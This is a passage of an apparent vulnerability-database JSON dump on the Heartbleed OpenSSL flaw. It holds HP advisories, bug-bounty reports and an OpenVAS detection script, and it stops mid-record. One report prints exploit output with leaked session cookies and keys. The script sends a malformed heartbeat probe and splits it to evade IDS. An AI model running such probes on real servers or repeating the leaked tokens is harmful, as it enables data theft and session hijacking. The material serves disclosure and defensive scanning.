"href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30478", "title": "[security bulletin] HPSBST03001 rev.1 - HP XP P9500 Disk Array running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04264595\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04264595\r\nVersion: 1\r\n\r\nHPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure\r\nof Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-05-01\r\nLast Updated: 2014-05-01\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP IBRIX X9320\r\nStorage running OpenSSL. This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101514\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP IBRIX X9320 Storage systems running HP StoreAll OS v6.3.3, v6.5 and v6.5.1\r\nwith these SKUs:\r\n\r\nQP333A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP334A\r\n HP IBRIX X9320 24TB 1TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP335A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Starter Kit\r\n\r\nQP336A\r\n HP IBRIX X9320 48TB 2TB 7.2K LFF Capacity Block Expansion Kit\r\n\r\nQP337A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Starter Kit\r\n\r\nQP338A\r\n HP IBRIX X9320 14.4TB 600GB 15K LFF Capacity Block Expansion Kit\r\n\r\nQZ722A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Starter Kit\r\n\r\nQZ723A\r\n HP IBRIX X9320 72TB 3TB 7.2K LFF MDL Storage Block Expansion Kit\r\n\r\nQZ724A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ725A\r\n HP IBRIX X9320 7.2TB 300GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nQZ726A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Starter Kit\r\n\r\nQZ727A\r\n HP IBRIX X9320 21.6TB 900GB 10K SFF Enterprise Storage Block Expansion Kit\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP IBRIX X9320 Storage. This bulletin will be revised when the\r\nsoftware updates are released.\r\n\r\nUntil the software updates are available, HP recommends restricting\r\nadministrative access to the MSA on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 1 May 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNiyroACgkQ4B86/C0qfVmYEwCgoYdOOiwyP2DpeGeGb40tS0Br\r\njfMAoMLbmVB2pdVa9XAfs92eV2+hhLNu\r\n=ZY1m\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-02T00:00:00", "published": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30524", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30524", "title": "[security bulletin] HPSBST03004 rev.1 - HP IBRIX X9320 Storage running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04261644\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04261644\r\nVersion: 2\r\n\r\nHPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-23\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP 3PAR OS\r\nrunning OpenSSL. This is the OpenSSL vulnerability known as "Heartbleed"\r\nwhich could be exploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101526\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP 3PAR OS 3.1.2 and subsequent\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of 3PAR OS. This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software update is available, HP recommends limiting 3PAR OS\r\nManagement Tools to use only on a secure and isolated private management\r\nnetwork.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\nVersion:2 (rev.2) - 23 April 2014 Added recommendation for use of 3PAR OS\r\nManagement Tools\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNYMYwACgkQ4B86/C0qfVmSXwCcDoqspliALHdporVpYpZ7t6jF\r\nOnQAn0ec0FZvxPMxM0Uk/iQ7K2kmO1DT\r\n=ORml\r\n-----END PGP SIGNATURE-----\r\n\r\n", "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30504", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30504", "title": "[security bulletin] HPSBST03015 rev.2 - HP 3PAR OS running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "hackerone": [{"lastseen": "2018-11-23T14:56:22", "bulletinFamily": "bugbounty", "bounty": 200.0, "description": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u043d\u0430 portal.sf.mail.ru\r\n\u042d\u0442\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0447\u0438\u0442\u0430\u0442\u044c \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u0443\u044e \u043f\u0430\u043c\u044f\u0442\u044c \u043a\u0443\u0441\u043a\u0430\u043c\u0438 \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u0434\u043e 64\u041a\u0411. \u041f\u0440\u0438\u0447\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0432\u0443\u0441\u0442\u043e\u0440\u043e\u043d\u043d\u044f\u044f, \u044d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0432\u044b \u043c\u043e\u0436\u0435\u0442\u0435 \u0447\u0438\u0442\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430, \u043d\u043e \u0438 \u0441\u0435\u0440\u0432\u0435\u0440 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0447\u0430\u0441\u0442\u044c \u0432\u0430\u0448\u0435\u0439 \u043e\u043f\u0435\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0439 \u043f\u0430\u043c\u044f\u0442\u0438 \u043a\u0430\u043a \u044d\u0442\u043e \u0441\u0434\u0435\u043b\u0430\u043b \u0438 \u044f \u0440\u0430\u0434\u0438 \u0447\u0438\u0441\u0442\u043e\u0433\u043e \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430.", "modified": "2014-12-10T19:29:15", "published": "2014-10-23T15:12:13", "id": "H1:32570", "href": "https://hackerone.com/reports/32570", "type": "hackerone", "title": "Mail.ru: OpenSSL HeartBleed (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-04T10:02:55", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "Pls see attachment files for details:\r\npython ssltest.py concrete5.org 443|more\r\n\r\nimpact: critical, pls patch it ASAP\r\n\r\nReferences:\r\nhttps://www.openssl.org/news/secadv_20140407.txt\r\nhttp://heartbleed.com\r\nhttps://github.com/openssl/openssl/commit/96db9023b881d7cd9f379b0c154650d6c108e9a3\r\n~g4mm4\r\nhttps://twitter.com/xchym", "modified": "2014-04-09T00:37:33", "published": "2014-04-08T11:01:31", "id": "H1:6475", "href": "https://hackerone.com/reports/6475", "type": "hackerone", "title": "concrete5: https://concrete5.org ::: HeartBleed Attack (CVE-2014-0160)", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-11-23T12:55:41", "bulletinFamily": "bugbounty", "bounty": 150.0, "description": "MacBook-Pro-Kirill:Pentest isox$ python heartbleed.py 185.30.178.33 -p 1443\r\n\r\ndefribulator v1.16\r\nA tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)\r\n\r\n##################################################################\r\nConnecting to: 185.30.178.33:1443, 1 times\r\nSending Client Hello for TLSv1.0\r\nReceived Server Hello for TLSv1.0\r\n\r\nWARNING: 185.30.178.33:1443 returned more data than it should - server is vulnerable!\r\nPlease wait... connection attempt 1 of 1\r\n##################################################################\r\n\r\n.@....SC[...r....+..H...9...\r\n....w.3....f...\r\n...!.9.8.........5...............\r\n.........3.2.....E.D...../...A.................................I.........\r\n...........\r\n...................................#.......X-Requested-With: XMLHttpRequest\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36\r\nReferer: https://adm.riotzone.net:1443/webadm/\r\nAccept-Encoding: gzip, deflate, sdch\r\nAccept-Language: en-US,en;q=0.8,ru;q=0.6\r\nCookie: fbm_335418533141749=base_domain=.riotzone.net; weblang=de; auser=1177778; atype=my; asess=2d53c33bbbb985848534e390323c0630; ashow=100007781204577@facebook; nofoo=1; anick=LaVerdad; aserv=1; level=50; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n\r\n.....\r\nSM....)..Z..............b....o...~..^..DF..4......g..%.E.EaVHhJUTZhak8xNWdJYTRIZExkVXpuSVUxVmIwZHVrSV9ZTWw0bkpEQktHVkQyQ3Fpb190MGZFclhMYVg2bjVBMTZnVkZpMWlHMzJ3VFVPNTlvZFR2VU5QWnBjZXBRaVh5OTNHdVR5cEJlR2NCUzhENWR5WXJTcU1CNHRteTl2Q01YTUhjQ212STFkRzZid0poaCIsImlzc3VlZF9hdCI6MTQyMTYwMjM1NCwidXNlcl9pZCI6IjEwMDAwNzc4MTIwNDU3NyJ9; sess_uid=1177778; sess_key=2d53c33bbbb985848534e390323c0630; __utma=72033936.1263205956.1413451723.1421595142.1421602346.373; __utmb=72033936.2.10.1421602346; __utmc=72033936; __utmz=72033936.1421073483.352.29.utmcsr=riotzone.net|utmccn=(referral)|utmcmd=referral|utmcct=/riot/RiotLoaderRelease.swf\r\n", "modified": "2015-09-13T12:13:15", "published": "2015-01-19T13:54:12", "id": "H1:44294", "href": "https://hackerone.com/reports/44294", "type": "hackerone", "title": "Mail.ru: Heartbleed: my.com (185.30.178.33) port 1433", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T00:39:12", "bulletinFamily": "bugbounty", "bounty": 0.0, "description": "A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server.\n\nOnly 1.0.1 and 1.0.2-beta releases of OpenSSL are affected including 1.0.1f and 1.0.2-beta1.\n\nThanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <agl@chromium.org> and Bodo Moeller <bmoeller@acm.org> for preparing the fix.\n\nAffected users should upgrade to OpenSSL 1.0.1g. Users unable to immediately upgrade can alternatively recompile OpenSSL with -DOPENSSL_NO_HEARTBEATS.\n\n1.0.2 will be fixed in 1.0.2-beta2.\n\nhttp://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=96db9023b881d7cd9f379b0c154650d6c108e9a3\n", "modified": "2014-04-07T16:53:31", "published": "2014-04-05T23:51:06", "id": "H1:6626", "href": "https://hackerone.com/reports/6626", "type": "hackerone", "title": "OpenSSL (IBB): TLS heartbeat read overrun", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "openvas": [{"lastseen": "2019-07-17T14:28:45", "bulletinFamily": "scanner", "description": "OpenSSL is prone to an information disclosure vulnerability.", "modified": "2019-07-05T00:00:00", "published": "2014-04-09T00:00:00", "id": "OPENVAS:1361412562310103936", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103936", "title": "SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103936\");\n script_version(\"2019-07-05T10:04:07+0000\");\n script_bugtraq_id(66690);\n script_cve_id(\"CVE-2014-0160\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 10:04:07 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2014-04-09 09:54:09 +0200 (Wed, 09 Apr 2014)\");\n script_name(\"SSL/TLS: OpenSSL TLS 'heartbeat' Extension Information Disclosure Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"SSL and TLS\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_tls_version_get.nasl\");\n script_mandatory_keys(\"ssl_tls/port\");\n\n script_xref(name:\"URL\", value:\"https://www.openssl.org/news/secadv/20140407.txt\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/66690\");\n\n script_tag(name:\"impact\", value:\"An attacker can exploit this issue to gain access to sensitive\n information that may aid in further attacks.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a special crafted TLS request and check the response.\");\n\n script_tag(name:\"insight\", value:\"The TLS and DTLS implementations do not properly handle\n Heartbeat Extension packets.\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"OpenSSL is prone to an information disclosure vulnerability.\");\n\n script_tag(name:\"affected\", value:\"OpenSSL 1.0.1f, 1.0.1e, 1.0.1d, 1.0.1c, 1.0.1b, 1.0.1a, and\n 1.0.1 are vulnerable.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"mysql.inc\"); # For recv_mysql_server_handshake() in open_ssl_socket()\ninclude(\"misc_func.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"ssl_funcs.inc\");\n\nfunction _broken_heartbeat( version, vtstring ) {\n\n local_var version, vtstring;\n local_var hb, payload;\n\n if( ! version )\n version = version = TLS_10;\n\n payload = raw_string( 0x01 ) + raw_string( 16384 / 256, 16384 % 256 ) + crap( length:16 ) + '------------------------->' + vtstring + '<-------------------------';\n hb = version + data_len( data:payload ) + payload;\n return hb;\n}\n\nfunction test_hb( port, version, vtstring ) {\n\n local_var port, version, vtstring;\n local_var soc, hello, data, record, hello_done, v, hb, d;\n\n soc = open_ssl_socket( port:port );\n if( ! soc )\n return FALSE;\n\n hello = ssl_hello( version:version, extensions:make_list( \"heartbeat\" ) );\n if( ! hello ) {\n close( soc );\n return FALSE;\n }\n\n send( socket:soc, data:hello );\n\n while ( ! hello_done ) {\n data = ssl_recv( socket:soc );\n if( ! data ) {\n close( soc );\n return FALSE;\n }\n\n record = search_ssl_record( data:data, search:make_array( \"handshake_typ\", SSLv3_SERVER_HELLO ) );\n if( record ) {\n if( record['extension_heartbeat_mode'] != 1 ) {\n close( soc );\n return;\n }\n }\n\n record = search_ssl_record( data:data, search:make_array( \"handshake_typ\", SSLv3_SERVER_HELLO_DONE ) );\n if( record ) {\n hello_done = TRUE;\n v = record[\"version\"];\n break;\n }\n }\n\n if( ! hello_done ) {\n close( soc );\n return FALSE;\n }\n\n # send heartbeat request in two packets to\n # work around stupid IDS which try to detect\n # attack by matching packets only\n hb = _broken_heartbeat( version:version, vtstring:vtstring );\n\n send( socket:soc, data:raw_string( 0x18 ) );\n send( socket:soc, data:hb );\n\n d = ssl_recv( socket:soc );\n\n if( strlen( d ) > 3 && string( \"->\", vtstring, \"<-\" ) >< d ) {\n security_message( port:port );\n exit( 0 );\n }\n\n if( soc )\n close( soc );\n\n return;\n}\n\nport = get_ssl_port();\nif( ! port )\n exit( 0 );\n\nif( ! versions = get_supported_tls_versions( port:port, min:SSL_v3, max:TLS_12 ) )\n exit( 0 );\n\nvt_strings = get_vt_strings();\nforeach version( versions ) {\n test_hb( port:port, version:version, vtstring:vt_strings[\"default\"] );\n}\n\nexit( 99 );", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:37:44", "bulletinFamily": "scanner", "description": "A vulnerability has been discovered\nin OpenSSL", 